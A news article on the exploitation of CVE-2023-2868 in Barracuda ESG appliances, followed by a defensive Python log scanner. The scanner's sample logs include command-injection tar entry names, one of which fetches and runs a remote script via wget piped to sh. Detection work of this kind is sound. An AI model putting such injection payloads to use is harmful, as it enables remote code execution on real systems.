ESG appliances compromised by a zero-day vulnerability

June 29, 2023

Barracuda Networks has published a warning that customers should replace their Email Security Gateway (ESG) appliances: an ongoing campaign has been exploiting a zero-day flaw in the devices, and although the flaw itself is now patched, the vendor does not consider a compromised unit safe to keep in service.

The company recommends that all affected customers replace impacted appliances rather than attempt to remediate them, regardless of patch level. Barracuda says it has notified affected customers through the user interface of the compromised Email Security Gateway appliances themselves.

Customers who have been notified but have not yet replaced their appliances should contact Barracuda support by email without delay.

This notice follows last month's events: Barracuda remotely patched CVE-2023-2868, a critical remote command injection flaw in the ESG's handling of incoming .tar email attachments, on all appliances worldwide, and a day later its security team pushed a dedicated script to cut off the attackers' access to appliances that had already been compromised.

ESG appliances started experiencing breaches last month.

Barracuda notified customers last month that their ESG appliances might have been breached through CVE-2023-2868 and recommended that they review their environments for signs of unauthorised activity. Separate research indicated that exploitation began as early as October of last year.

According to the company, the attackers exploited the flaw as a zero-day for at least seven months, using it to plant custom malware on customers' ESG appliances. A week ago Barracuda disclosed that this malware was used to steal data from the compromised devices.

The threat actors first used the flaw in October 2022 to breach a subset of ESG appliances and deploy malware that gave them persistent access to the compromised devices. Barracuda's investigation, carried out with Mandiant, attributed two of the tools to the campaign: Saltwater, a backdoor implanted in the appliance's SMTP daemon, and SeaSide, a module that watches incoming SMTP HELO/EHLO commands for attacker-supplied instructions and uses them to spawn a reverse shell for remote access.

The attackers then exfiltrated data from the backdoored ESG appliances. CISA has also added CVE-2023-2868 to its Known Exploited Vulnerabilities catalogue.
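Barracuda's advice to watch for signs of unwanted activity is easier to act on with concrete checks. The script below is an added example, not code from Barracuda or Mandiant, and it runs over constructed log lines in a made-up format (real appliance logs look different, so the parser is the part to adapt). It encodes two indicators that follow from the public description of this campaign: CVE-2023-2868 is triggered by shell metacharacters in the member names of a .tar attachment, which the appliance interpolated into a command, and SeaSide takes its instructions from SMTP HELO/EHLO arguments, which on a normal session are hostnames or bracketed address literals. The function names, the log format and the sample lines are all assumptions made here.

```python
import re
from dataclasses import dataclass

# Constructed sample log lines in a hypothetical format (not Barracuda's actual
# log layout): timestamp, event type, then a detail field.  Replace LINE and the
# field regexes below with ones matching your own logs.
SAMPLE_LOGS = """\
2023-05-18T09:14:02Z ATTACH tar name=invoice_2023.tar entry=docs/report.pdf
2023-05-18T09:14:05Z HELO arg=mail.example.com
2023-05-18T09:15:31Z ATTACH tar name=update.tar entry=`wget${IFS}203.0.113.5/x|sh`
2023-05-18T09:16:07Z EHLO arg=198.51.100.7:4444
2023-05-18T09:17:44Z HELO arg=smtp-out.partner.example
2023-05-18T09:18:12Z ATTACH tar name=a.tar entry=pics/'$(id)'.jpg
"""

# Shell metacharacters that have no business in an archive member name; the
# exploit relied on the member name being interpolated into a shell command.
SHELL_META = re.compile(r"[`$();|&<>'\"\n]")

# RFC 1123-style hostname: dot-separated labels of letters, digits and hyphens.
# Bracketed address literals are also legitimate HELO/EHLO arguments.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)([A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)
ADDR_LITERAL = re.compile(r"^\[(?:\d{1,3}\.){3}\d{1,3}\]$|^\[IPv6:[0-9A-Fa-f:.]+\]$")

# Parser for the hypothetical log format above.
LINE = re.compile(r"^(?P<ts>\S+) (?P<kind>ATTACH|HELO|EHLO) (?P<rest>.*)$")


@dataclass
class Finding:
    timestamp: str
    rule: str
    detail: str


def tar_entry_suspicious(entry: str) -> bool:
    """True if a tar member name contains shell metacharacters."""
    return bool(SHELL_META.search(entry))


def helo_arg_suspicious(arg: str) -> bool:
    """True if a HELO/EHLO argument is neither a hostname nor an address literal."""
    return not (HOSTNAME.match(arg) or ADDR_LITERAL.match(arg))


def scan(log_text: str) -> list[Finding]:
    """Run both indicator checks over every parseable line and collect hits."""
    findings: list[Finding] = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not an event we know how to parse
        ts, kind, rest = m.group("ts", "kind", "rest")
        if kind == "ATTACH":
            em = re.search(r"entry=(.*)$", rest)
            if em and tar_entry_suspicious(em.group(1)):
                findings.append(Finding(ts, "tar-entry-shell-meta", em.group(1)))
        else:  # HELO or EHLO
            am = re.search(r"arg=(.*)$", rest)
            if am and helo_arg_suspicious(am.group(1)):
                findings.append(Finding(ts, "helo-arg-not-hostname", am.group(1)))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"{f.timestamp} {f.rule}: {f.detail}")
```

On the sample input the scanner flags the two archive entries carrying backticks, `$(...)` and quotes, and the EHLO argument that is an IP:port pair rather than a hostname; the clean attachment and the two ordinary hostnames pass. The hostname rule is deliberately loose (a bare, unbracketed IP address still passes, because some legitimate clients send one), so tighten it to your own environment, and treat these heuristics as a supplement to the vendor's published indicators rather than a replacement for them.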

Barracuda says roughly 200,000 organisations use its products, including well-known firms such as Delta Air Lines, Kraft, Mitsubishi and Samsung.
